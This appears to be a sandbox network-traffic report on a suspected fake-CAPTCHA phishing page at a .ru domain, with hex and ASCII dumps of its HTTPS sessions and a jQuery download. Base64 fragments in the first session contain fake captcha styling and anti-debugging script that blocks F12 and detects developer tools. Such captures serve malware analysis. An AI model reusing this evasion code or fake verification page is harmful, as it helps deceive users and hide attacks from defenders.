                                    2024-12-10 17:13:13 UTC1369INData Raw: 32 78 70 5a 43 41 6a 5a 44 4e 6b 4d 32 51 7a 4f 77 30 4b 49 43 41 67 49 47 4a 76 63 6d 52 6c 63 69 31 79 59 57 52 70 64 58 4d 36 49 44 4e 77 65 44 73 4e 43 69 41 67 49 43 42 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 4c 57 4e 76 62 47 39 79 4f 69 41 6a 5a 6d 5a 6d 4f 77 30 4b 49 43 41 67 49 47 31 68 63 6d 64 70 62 69 31 79 61 57 64 6f 64 44 6f 67 4d 54 42 77 65 44 73 4e 43 69 41 67 49 43 42 77 62 33 4e 70 64 47 6c 76 62 6a 6f 67 63 6d 56 73 59 58 52 70 64 6d 55 37 44 51 70 39 44 51 6f 4e 43 69 35 6a 59 58 42 30 59 32 68 68 4c 57 4e 6f 5a 57 4e 72 59 6d 39 34 49 47 6c 75 63 48 56 30 57 33 52 35 63 47 55 39 49 6d 4e 6f 5a 57 4e 72 59 6d 39 34 49 6c 30 36 59 32 68 6c 59 32 74 6c 5a 43 41 72 49 47 78 68 59 6d 56 73 49 43 35 6a 59 58 42 30 59 32 68 68 4c 57 4e 6f
                                    Data Ascii: 2xpZCAjZDNkM2QzOw0KICAgIGJvcmRlci1yYWRpdXM6IDNweDsNCiAgICBiYWNrZ3JvdW5kLWNvbG9yOiAjZmZmOw0KICAgIG1hcmdpbi1yaWdodDogMTBweDsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQp9DQoNCi5jYXB0Y2hhLWNoZWNrYm94IGlucHV0W3R5cGU9ImNoZWNrYm94Il06Y2hlY2tlZCArIGxhYmVsIC5jYXB0Y2hhLWNo
                                    2024-12-10 17:13:13 UTC1369INData Raw: 35 76 62 6d 55 37 44 51 6f 67 49 43 41 67 5a 6d 78 6c 65 43 31 6b 61 58 4a 6c 59 33 52 70 62 32 34 36 49 47 4e 76 62 48 56 74 62 6a 73 4e 43 69 41 67 49 43 42 68 62 47 6c 6e 62 69 31 70 64 47 56 74 63 7a 6f 67 59 32 56 75 64 47 56 79 4f 77 30 4b 49 43 41 67 49 48 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 77 30 4b 49 43 41 67 49 47 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 49 44 45 77 63 48 67 37 44 51 70 39 44 51 6f 4e 43 69 35 6a 59 58 42 30 59 32 68 68 4c 57 4e 76 62 6e 52 6c 62 6e 51 67 61 57 31 6e 49 48 73 4e 43 69 41 67 49 43 42 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 4e 43 69 41 67 49 43 42 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 69 41 78 4d 48 42 34 4f 77 30 4b 66 51 30 4b 44 51 6f 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62
                                    Data Ascii: 5vbmU7DQogICAgZmxleC1kaXJlY3Rpb246IGNvbHVtbjsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIHdpZHRoOiAxMDAlOw0KICAgIG1hcmdpbi10b3A6IDEwcHg7DQp9DQoNCi5jYXB0Y2hhLWNvbnRlbnQgaW1nIHsNCiAgICB3aWR0aDogMTAwJTsNCiAgICBtYXJnaW4tYm90dG9tOiAxMHB4Ow0KfQ0KDQouY2FwdGNoYS1jb
                                    2024-12-10 17:13:13 UTC1369INData Raw: 6b 62 33 63 75 62 47 39 6a 59 58 52 70 62 32 34 67 50 53 41 69 59 57 4a 76 64 58 51 36 59 6d 78 68 62 6d 73 69 4f 77 30 4b 66 51 30 4b 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 57 52 6b 52 58 5a 6c 62 6e 52 4d 61 58 4e 30 5a 57 35 6c 63 69 67 6e 61 32 56 35 5a 47 39 33 62 69 63 73 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 56 32 5a 57 35 30 4b 53 42 37 44 51 6f 67 49 43 41 67 61 57 59 67 4b 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 45 79 4d 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51 6f 67 49 43 41 67 66 51 30 4b 44 51 6f 67 49 43
                                    Data Ascii: kb3cubG9jYXRpb24gPSAiYWJvdXQ6YmxhbmsiOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2ZW50LmtleUNvZGUgPT09IDEyMykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogIC
                                    2024-12-10 17:13:13 UTC1369INData Raw: 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 6a 62 32 35 7a 64 43 42 68 54 47 4a 4d 61 6c 64 54 53 6d 5a 6b 49 44 30 67 4d 54 41 77 4f 77 30 4b 49 43 41 67 49 48 4e 6c 64 45 6c 75 64 47 56 79 64 6d 46 73 4b 47 5a 31 62 6d 4e 30 61 57 39 75 4b 43 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 7a 56 48 4a 49 52 6b 39 49 54 30 74 4d 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 52 6c 59 6e 56 6e 5a 32 56 79 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 6f 56 30 39 46 55 6b 68 69 63 6c 52 32 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 49 43 68
                                    Data Ascii: YWxzZTsNCiAgICBjb25zdCBhTGJMaldTSmZkID0gMTAwOw0KICAgIHNldEludGVydmFsKGZ1bmN0aW9uKCkgew0KICAgICAgICBjb25zdCBzVHJIRk9IT0tMID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGRlYnVnZ2VyOw0KICAgICAgICBjb25zdCBoV09FUkhiclR2ID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGlmICh
                                    2024-12-10 17:13:13 UTC1369INData Raw: 55 46 43 52 44 51 79 4e 48 46 42 51 55 46 42 51 6b 64 6b 51 6c 52 56 52 55 46 42 54 45 64 51 51 79 39 34 61 45 4a 52 51 55 46 42 51 55 5a 36 56 57 74 6b 51 30 46 4c 4e 30 39 49 54 32 74 42 51 55 46 4e 51 56 56 46 65 46 56 53 56 57 52 33 56 45 39 73 51 6b 30 72 64 45 4a 4e 4b 33 68 43 54 6d 31 35 54 32 52 32 4f 58 42 4e 61 6b 4e 75 56 30 56 4c 52 6a 67 77 54 30 63 35 52 43 74 42 4c 79 39 43 51 55 35 31 64 45 4e 4f 54 33 42 44 54 6b 39 57 52 45 31 71 54 32 39 56 61 6b 64 79 56 6b 52 50 62 6c 56 31 61 45 46 4f 52 45 39 75 56 57 70 50 62 56 56 31 61 45 52 4f 5a 6d 6b 33 51 6c 52 4c 62 6c 56 71 54 32 35 56 61 6b 39 75 56 58 56 77 51 30 35 6c 63 45 31 4e 5a 58 52 43 54 6d 56 77 51 30 35 46 64 54 42 59 54 33 52 45 54 6b 39 30 51 30 35 45 55 32 39 56 61 6c 4e 76
                                    Data Ascii: UFCRDQyNHFBQUFBQkdkQlRVRUFBTEdQQy94aEJRQUFBQUZ6VWtkQ0FLN09IT2tBQUFNQVVFeFVSVWR3VE9sQk0rdEJNK3hCTm15T2R2OXBNakNuV0VLRjgwT0c5RCtBLy9CQU51dENOT3BDTk9WRE1qT29VakdyVkRPblV1aEFORE9uVWpPbVV1aEROZmk3QlRLblVqT25Vak9uVXVwQ05lcE1NZXRCTmVwQ05FdTBYT3RETk90Q05EU29ValNv
                                    2024-12-10 17:13:13 UTC1369INData Raw: 46 4a 63 56 4e 36 53 6a 49 72 64 55 39 36 63 56 6c 76 55 45 5a 35 53 57 78 50 63 6c 49 34 59 54 4e 48 64 6c 64 50 52 6a 67 32 4e 45 59 77 56 33 46 55 53 57 46 33 54 58 5a 54 52 55 63 30 4e 6e 6c 4d 4c 31 64 4b 52 32 4e 4b 65 57 35 68 56 55 46 42 51 55 52 48 5a 45 5a 4b 54 31 56 33 52 48 63 72 51 54 42 43 51 57 64 61 57 56 4e 42 5a 31 45 77 62 54 52 4c 5a 30 46 35 61 69 39 69 4d 7a 41 76 64 6a 64 54 65 55 38 32 56 30 49 76 56 45 70 42 65 6e 46 52 53 6c 70 56 64 6a 51 7a 4f 56 46 7a 55 47 34 33 57 56 52 32 4f 46 68 6f 4e 6e 5a 53 54 54 64 6d 4d 6e 49 30 5a 6a 5a 56 62 31 64 78 4b 31 56 78 56 6d 4a 6d 4e 6d 35 72 52 6d 39 43 54 46 52 4b 64 69 74 74 5a 47 67 76 4e 6b 78 52 56 6b 45 77 63 6b 4a 45 5a 7a 67 7a 55 7a 46 54 51 30 6c 73 53 57 52 7a 56 43 39 32 5a
                                    Data Ascii: FJcVN6SjIrdU96cVlvUEZ5SWxPclI4YTNHdldPRjg2NEYwV3FUSWF3TXZTRUc0NnlML1dKR2NKeW5hVUFBQURHZEZKT1V3RHcrQTBCQWdaWVNBZ1EwbTRLZ0F5ai9iMzAvdjdTeU82V0IvVEpBenFRSlpVdjQzOVFzUG43WVR2OFhoNnZSTTdmMnI0ZjZVb1dxK1VxVmJmNm5rRm9CTFRKdittZGgvNkxRVkEwckJEZzgzUzFTQ0lsSWRzVC92Z
                                    2024-12-10 17:13:13 UTC1369INData Raw: 70 61 57 46 4c 57 47 52 61 53 31 5a 76 59 55 56 4d 52 30 63 30 56 48 56 6b 59 58 42 34 55 58 6c 51 4e 6d 74 78 61 6b 39 7a 63 44 56 53 62 6a 5a 46 57 47 35 79 65 6d 31 35 64 48 4e 78 56 47 74 4e 4c 32 6c 73 54 57 46 4c 4d 32 4e 59 54 57 39 68 56 30 70 4e 54 47 46 69 63 31 5a 72 53 6e 64 34 64 47 4e 53 55 7a 41 76 54 46 4a 59 53 6e 63 79 64 46 4e 6c 62 6c 68 53 5a 47 78 53 55 31 4a 70 59 54 52 34 4f 57 51 77 54 58 51 31 54 45 64 4c 51 58 52 59 5a 54 68 53 63 54 4e 35 4b 33 6c 6a 61 43 39 44 61 33 70 31 61 6c 4a 61 51 6b 74 4f 54 7a 4a 4f 4e 57 4e 34 4e 44 6c 77 56 57 46 4d 54 47 77 32 51 6a 5a 4c 4f 56 41 79 57 44 6c 44 4d 55 4a 6d 65 6e 63 76 51 30 73 72 63 30 30 78 59 6b 78 4d 53 6c 6c 33 54 6c 64 78 65 44 6c 31 4e 55 31 45 63 7a 68 44 63 30 63 78 63 7a
                                    Data Ascii: paWFLWGRaS1ZvYUVMR0c0VHVkYXB4UXlQNmtxak9zcDVSbjZFWG5yem15dHNxVGtNL2lsTWFLM2NYTW9hV0pNTGFic1ZrSnd4dGNSUzAvTFJYSncydFNlblhSZGxSU1JpYTR4OWQwTXQ1TEdLQXRYZThScTN5K3ljaC9Da3p1alJaQktOTzJONWN4NDlwVWFMTGw2QjZLOVAyWDlDMUJmencvQ0src00xYkxMSll3TldxeDl1NU1EczhDc0cxcz


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.749738151.101.194.1374437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-12-10 17:13:15 UTC624OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                    Host: code.jquery.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: script
                                    Referer: https://0hxj.diitalwave.ru/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-12-10 17:13:16 UTC613INHTTP/1.1 200 OK
                                    Connection: close
                                    Content-Length: 89501
                                    Server: nginx
                                    Content-Type: application/javascript; charset=utf-8
                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                    ETag: "28feccc0-15d9d"
                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                    Access-Control-Allow-Origin: *
                                    Cross-Origin-Resource-Policy: cross-origin
                                    Via: 1.1 varnish, 1.1 varnish
                                    Accept-Ranges: bytes
                                    Date: Tue, 10 Dec 2024 17:13:15 GMT
                                    Age: 2372327
                                    X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740037-EWR
                                    X-Cache: HIT, HIT
                                    X-Cache-Hits: 2774, 6
                                    X-Timer: S1733850796.920466,VS0,VE0
                                    Vary: Accept-Encoding
                                    2024-12-10 17:13:16 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                    Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                    2024-12-10 17:13:16 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                    Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                    2024-12-10 17:13:16 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                    Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                    2024-12-10 17:13:16 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                    Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                    2024-12-10 17:13:16 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                    Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                    2024-12-10 17:13:16 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                    Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                    2024-12-10 17:13:16 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                    Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                    2024-12-10 17:13:16 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                    Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                    2024-12-10 17:13:16 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                    Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                    2024-12-10 17:13:16 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                    Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    5192.168.2.749745151.101.194.1374437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-12-10 17:13:17 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                    Host: code.jquery.com
                                    Connection: keep-alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: */*
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
